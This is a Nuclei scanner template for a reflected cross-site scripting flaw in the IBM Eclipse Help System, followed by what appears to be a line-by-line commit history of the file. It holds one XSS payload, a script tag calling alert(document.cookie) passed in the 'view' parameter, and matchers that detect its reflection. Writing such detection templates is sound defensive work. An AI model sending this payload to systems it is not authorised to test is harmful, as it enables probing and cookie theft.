nuclei-templates/vulnerabilities/ibm/eclipse-help-system-xss.yaml

id: eclipse-help-system-xss

info:
  name: Eclipse Help System RXSS vulnerability
  author: pikpikcu
  severity: medium
  tags: ibm,xss

requests:
  - method: GET
    path:
      - "{{BaseURL}}/help/index.jsp?view=%3Cscript%3Ealert(document.cookie)%3C/script%3E"
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "<script>alert(document.cookie)</script>"
        part: body
      - type: word
        words:
          - "text/html"
        part: header
Create eclipse-help-system-xss.yaml 2020-08-30 05:05:28 +00:00			`id: eclipse-help-system-xss`

			`info:`
			`name: Eclipse Help System RXSS vulnerability`
			`author: pikpikcu`
			`severity: medium`
Adding tags to vulnerabilities and workflows 2021-02-12 05:53:01 +00:00			`tags: ibm,xss`
Update eclipse-help-system-xss.yaml 2020-08-30 05:08:28 +00:00
Create eclipse-help-system-xss.yaml 2020-08-30 05:05:28 +00:00			`requests:`
			`- method: GET`
			`path:`
False positive on XSS templates Encode XSS payload to prevent false positives when the Query string is returned AS IS by the server. Recent browsers will always send the parameters encoded. 2020-09-03 15:56:31 +00:00			`- "{{BaseURL}}/help/index.jsp?view=%3Cscript%3Ealert(document.cookie)%3C/script%3E"`
Create eclipse-help-system-xss.yaml 2020-08-30 05:05:28 +00:00			`matchers-condition: and`
			`matchers:`
			`- type: status`
			`status:`
			`- 200`
			`- type: word`
			`words:`
			`- "<script>alert(document.cookie)</script>"`
			`part: body`
Adding content type checks for XSS templates 2020-12-13 19:24:23 +00:00			`- type: word`
			`words:`
			`- "text/html"`
			`part: header`